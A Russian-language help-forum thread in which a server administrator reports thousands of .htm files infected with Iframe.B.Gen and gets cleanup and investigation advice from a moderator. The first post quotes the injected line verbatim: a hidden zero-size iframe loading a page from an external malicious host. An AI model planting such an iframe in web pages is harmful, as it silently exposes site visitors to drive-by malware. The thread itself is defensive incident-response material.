Показано с 1 по 8 из 8.

Iframe.B.Gen найден NOD32 (заявка № 140349)

  1. #1
    Junior Member Репутация
    Регистрация
    13.06.2013
    Сообщений
    5
    Вес репутации
    17

    Iframe.B.Gen найден NOD32

    Нa Windows Server 2008 R2 64 Terminal антивирусом NOD32 обнаружено более 8000 .htm файлов зараженных Iframe.B.Gen
    Визуально видно что к файлам добавлена строка:
    p
    <nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>

    1.Как почистить столько файлов без удаления?
    2.Как найти виновника?

    Помогите, pls!
    hijackthis.log
    virusinfo_syscheck.zip

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,461
    Вес репутации
    342
    Уважаемый(ая) MaeXtro, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    9,009
    Вес репутации
    465
    Логи делали из терминальной сессии ? Если да, то необходимо переделать непосредственно за компьютером.

    - - - Добавлено - - -

    + Сделайте полный образ автозапуска uVS

  5. #4
    Junior Member Репутация
    Регистрация
    13.06.2013
    Сообщений
    5
    Вес репутации
    17

    Удалось сделать логи на сервере


  6. #5
    Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mrak74
    Регистрация
    03.10.2009
    Адрес
    Москва
    Сообщений
    9,009
    Вес репутации
    465
    - Проведите процедуру, которая описана тут. Ссылку на результат проверки напишите в сообщении здесь.

    Цитата Сообщение от MaeXtro Посмотреть сообщение
    1.Как почистить столько файлов без удаления?
    Антивирус сам блокирует вредоносные ссылки. Сайт tsm.25u... уже находится в списке вредоносных.

    Цитата Сообщение от MaeXtro Посмотреть сообщение
    2.Как найти виновника?
    1) Если это среверная платформа, не предназначенная для постоянного использования пользователями интернета непосредственно с самого сервера, то почему не стоит специально предназначенный для серверных платформ антивирус ESET File Security?
    2) Предполагаю использование интернета непосредственно с сервера. Сопоставьте время обнаружения данных атак и журналов системы, кто был залогинен в тот момент на сервере.

    + Откройте файл ScanVuln.txt. Выполните из этого файла скрипт в AVZ. В результате работы скрипта будет создан файл - avz_log.txt.
    Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления(если таковые будут).
    Перезагрузите компьютер.
    Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

  7. #6
    Junior Member Репутация
    Регистрация
    13.06.2013
    Сообщений
    5
    Вес репутации
    17

    Продолжение

    http://files.mail.ru/6F1D4B520AD542C1979FA312BBA14032
    Цитата Сообщение от mrak74 Посмотреть сообщение
    - Проведите процедуру, которая описана тут. Ссылку на результат проверки напишите в сообщении здесь.

    Антивирус сам блокирует вредоносные ссылки. Сайт tsm.25u... уже находится в списке вредоносных.


    1) Если это среверная платформа, не предназначенная для постоянного использования пользователями интернета непосредственно с самого сервера, то почему не стоит специально предназначенный для серверных платформ антивирус ESET File Security?
    Защитка оказалась слабовата

    2) Предполагаю использование интернета непосредственно с сервера. Сопоставьте время обнаружения данных атак и журналов системы, кто был залогинен в тот момент на сервере.

    + Откройте файл ScanVuln.txt. Выполните из этого файла скрипт в AVZ. В результате работы скрипта будет создан файл - avz_log.txt.
    Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления(если таковые будут).
    Перезагрузите компьютер.
    Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

  8. #7

  9. #8
    Junior Member Репутация
    Регистрация
    13.06.2013
    Сообщений
    5
    Вес репутации
    17
    Скрипт все время предлагает:
    Несанкционированные цифровые сертификаты делают возможным подмену содержимого
    http://download.microsoft.com/downlo...718704-x64.msu

    а при установке система говорит, что уже обновлена

    Извините лог не влез по размеру:
    http://files.mail.ru/706C500FD7EA49A99650D85505F8FB7C

  • Уважаемый(ая) MaeXtro, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 17
      Последнее сообщение: 25.08.2010, 22:29
    2. NOD32 и NOD32 Smart Security сертифицированы для работы с Windows 7
      От SDA в разделе Новости компьютерной безопасности
      Ответов: 1
      Последнее сообщение: 14.02.2010, 15:54
    3. Ответов: 6
      Последнее сообщение: 09.02.2010, 00:23
    4. iframe'ы
      От uzayli в разделе Помогите!
      Ответов: 9
      Последнее сообщение: 14.07.2009, 22:29
    5. HTML:IFrame-HW [Trj]
      От lion553 в разделе Помогите!
      Ответов: 3
      Последнее сообщение: 10.07.2009, 15:02

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00405 seconds with 17 queries